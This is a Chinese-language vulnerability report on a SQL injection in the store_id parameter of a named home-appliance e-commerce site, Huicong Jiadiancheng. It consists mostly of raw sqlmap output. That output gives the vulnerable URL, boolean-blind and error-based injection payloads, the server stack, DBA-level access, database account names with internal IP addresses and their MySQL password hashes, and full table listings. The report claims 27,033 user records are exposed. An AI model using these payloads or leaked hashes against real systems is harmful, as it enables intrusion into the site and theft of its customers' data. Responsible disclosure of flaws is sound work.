慧聪家电城存在SQL注入漏洞,涉及27033条用户数据

漏洞URL:https://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B

注入点:store_id


 

sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests: --- Parameter: store_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: act=show_store&store_id=-6061 OR 1964=1964# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)# --- web server operating system: Linux CentOS 6.5 web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL >= 5.0.0 sqlmap resumed the following injection point(s) from stored session: --- Parameter: store_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: act=show_store&store_id=-6061 OR 1964=1964# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)# --- web server operating system: Linux CentOS 6.5 web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5 current user: '[email protected]' current database: 'jdmall' current user is DBA: True sqlmap resumed the following injection point(s) from stored session: --- Parameter: store_id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: act=show_store&store_id=-6061 OR 1964=1964# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)# --- web server operating system: Linux CentOS 6.5 web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5 database management system users [11]: [*] ''@'hcjdc' [*] ''@'localhost' [*] 'bj001'@'192.168.50.167' [*] 'bj001'@'192.168.60.%' [*] 'bj001'@'192.168.70.250' [*] 'root'@'127.0.0.1' [*] 'root'@'hcjdc' [*] 'root'@'localhost' [*] 'test2'@'localhost' [*] 'wangheng2'@'%' [*] 'wangheng2'@'58.252.73.135' database management system users password hashes: [*] bj001 [2]: password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F password hash: NULL [*] root [2]: password hash: *68A0D0586406B0933796F17C337E99BB02E07788 password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F [*] test2 [1]: password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA [*] wangheng2 [2]: password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F





数据库和表:
 

back-end DBMS: MySQL 5 Database: hcjdmjcrm [46 tables] +---------------------------------------+ | crm_attendplace | | crm_contact | | crm_contract | | crm_contract_attachment | | crm_customer | | crm_customer_industryissue | | crm_customer_offlineactivity | | crm_customer_spreadproject | | crm_dealrecord | | crm_follow | | crm_industryissue | | crm_invoice | | crm_offlineactivity | | crm_offlineactivityinviterecord | | crm_order | | crm_order_details | | crm_product | | crm_product_category | | crm_receive | | crm_spreadproject | | crm_supplier | | crm_supplierdealdetail | | hr_department | | hr_employee | | hr_position | | hr_post | | param_city | | param_sysparam | | param_sysparam_type | | personal_calendar | | personal_notes | | public_news | | public_notice | | sys_app | | sys_authority | | sys_button | | sys_data_authority | | sys_info | | sys_log | | sys_log_err | | sys_menu | | sys_online | | sys_role | | sys_role_emp | | temp | | tool_batch | +---------------------------------------+ Database: jdmall [196 tables] +---------------------------------------+ | base_appendproperty | | base_appendpropertyinstance | | base_button | | base_file | | base_log | | base_month | | base_notice | | base_o_a_setup | | base_organization | | base_recyclebin | | base_roleright | | base_roles | | base_stafforganize | | base_sysloginlog | | base_sysmenu | | base_usergroup | | base_usergroupright | | base_userinfo | | base_userinfousergroup | | base_userright | | base_userrole | | jd_account_log | | jd_ad | | jd_ad_custom | | jd_ad_position | | jd_admin_action | | jd_admin_log | | jd_admin_message | | jd_admin_user | | jd_adsense | | jd_affiliate_log | | jd_agency | | jd_area_region | | jd_article | | jd_article_cat | | jd_attribute | | jd_auction_log | | jd_auto_manage | | jd_back_goods | | jd_back_order | | jd_bonus_log | | jd_bonus_price | | jd_bonus_type | | jd_booking_goods | | jd_brand | | jd_brand_cat | | jd_brand_copy | | jd_cancel_goods_log | | jd_card | | jd_cart | | jd_cat_recommend | | jd_category | | jd_category1 | | jd_category2 | | jd_check_log | | jd_collect_goods | | jd_comment | | jd_compare_log | | jd_crons | | jd_delivery_goods | | jd_delivery_order | | jd_delivery_order_remark | | jd_email_list | | jd_email_sendlist | | jd_entrust | | jd_entrust_log | | jd_error_log | | jd_exchange_goods | | jd_favourable_activity | | jd_feedback | | jd_free_sample | | jd_friend_link | | jd_goods | | jd_goods_activity | | jd_goods_article | | jd_goods_attr | | jd_goods_attr_log | | jd_goods_cat | | jd_goods_gallery | | jd_goods_log | | jd_goods_price_log | | jd_goods_type | | jd_goods_unit | | jd_grab_address | | jd_grab_area | | jd_grab_site_info | | jd_group_goods | | jd_hc360_category | | jd_house_cat | | jd_keywords | | jd_link_goods | | jd_login_log_0 | | jd_login_log_1 | | jd_login_log_2 | | jd_login_log_3 | | jd_login_log_4 | | jd_login_log_5 | | jd_login_log_6 | | jd_login_log_7 | | jd_login_log_8 | | jd_login_log_9 | | jd_logistics | | jd_mail_templates | | jd_member_price | | jd_mmt_shop_info | | jd_mmt_shop_info_copy | | jd_nav | | jd_order_action | | jd_order_goods | | jd_order_info | | jd_order_logistics | | jd_pack | | jd_package_goods | | jd_pay_log | | jd_payment | | jd_plugins | | jd_priceoff_activity | | jd_priceoff_activity_log | | jd_priceoff_goods | | jd_products | | jd_provider | | jd_provider_product | | jd_recommend_list | | jd_reconciliation | | jd_refund_goods | | jd_refund_orders | | jd_reg_confirm_log | | jd_reg_extend_info | | jd_reg_fields | | jd_reg_sms_log | | jd_region | | jd_region_bak | | jd_retailer_info | | jd_role | | jd_salesupport_request | | jd_salesupport_response | | jd_search_log | | jd_searchengine | | jd_server_edit_log | | jd_server_info | | jd_server_information | | jd_server_logistics | | jd_sessions | | jd_sessions_data | | jd_shield_city | | jd_shipping | | jd_shipping_area | | jd_shop | | jd_shop_cat | | jd_shop_company_info | | jd_shop_company_info_bat | | jd_shop_config | | jd_sms_extend_user | | jd_sms_log | | jd_snatch_log | | jd_stats | | jd_supplier_info | | jd_suppliers | | jd_tag | | jd_template | | jd_topic | | jd_touch_activity | | jd_touch_ad | | jd_touch_ad_position | | jd_touch_adsense | | jd_touch_article | | jd_touch_article_cat | | jd_touch_auth | | jd_touch_brand | | jd_touch_category | | jd_touch_feedback | | jd_touch_goods | | jd_touch_goods_activity | | jd_touch_nav | | jd_touch_payment | | jd_touch_shop_config | | jd_touch_topic | | jd_touch_user_info | | jd_user_account | | jd_user_address | | jd_user_bonus | | jd_user_card_info | | jd_user_feed | | jd_user_key | | jd_user_rank | | jd_user_white_list | | jd_users | | jd_users_new | | jd_virtual_card | | jd_volume_price | | jd_volume_price_log | | jd_vote | | jd_vote_log | | jd_vote_option | | jd_voucher | | jd_wholesale | +---------------------------------------+ Database: information_schema [28 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ Database: mysql [23 tables] +---------------------------------------+ | user | | columns_priv | | db | | event | | func | | general_log | | help_category | | help_keyword | | help_relation | | help_topic | | host | | ndb_binlog_index | | plugin | | proc | | procs_priv | | servers | | slow_log | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | +---------------------------------------+



用户表数据总共:27033条